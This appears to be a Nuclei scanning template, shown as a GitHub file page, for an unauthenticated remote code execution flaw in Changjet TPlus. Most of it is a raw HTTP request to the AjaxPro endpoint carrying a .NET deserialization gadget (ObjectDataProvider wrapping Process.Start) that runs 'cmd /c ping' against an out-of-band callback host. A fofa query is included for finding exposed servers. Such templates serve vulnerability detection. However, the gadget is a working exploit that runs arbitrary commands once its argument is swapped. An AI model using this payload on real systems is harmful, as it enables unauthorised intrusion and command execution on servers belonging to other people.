-
Notifications
You must be signed in to change notification settings - Fork 1
/
changjet-tplus-ajaxpro-rce.yaml
46 lines (42 loc) · 1.52 KB
/
changjet-tplus-ajaxpro-rce.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
id: changjet-tplus-ajaxpro-rce
info:
name: Changjet TPlus - Remote Code Execution
author: Co5mos
severity: critical
description: |
Changjet TPlus allows remote unauthenticated users to to execute arbitrary commands.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
metadata:
max-request: 1
verified: true
fofa-query: app="畅捷通-TPlus"
tags: rce,changjie,tplus
http:
- raw:
- |
POST /tplus/ajaxpro/Ufida.T.CodeBehind.PriorityLevel,App Code.ashx?method=GetstoreWarehouseByStore HTTP/1.1
Host: {{Hostname}}
X-Ajaxpro-Method: GetstoreWarehouseByStore
Accept-Encoding:gzip
{
"storeID": {
"__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName": "Start",
"ObjectInstance": {
"__type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo": {
"__type": "System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName": "cmd",
"Arguments": "/c ping {{interactsh-url}}"
}
}
}
}
matchers:
- type: word
part: interactsh_protocol
words:
- "http"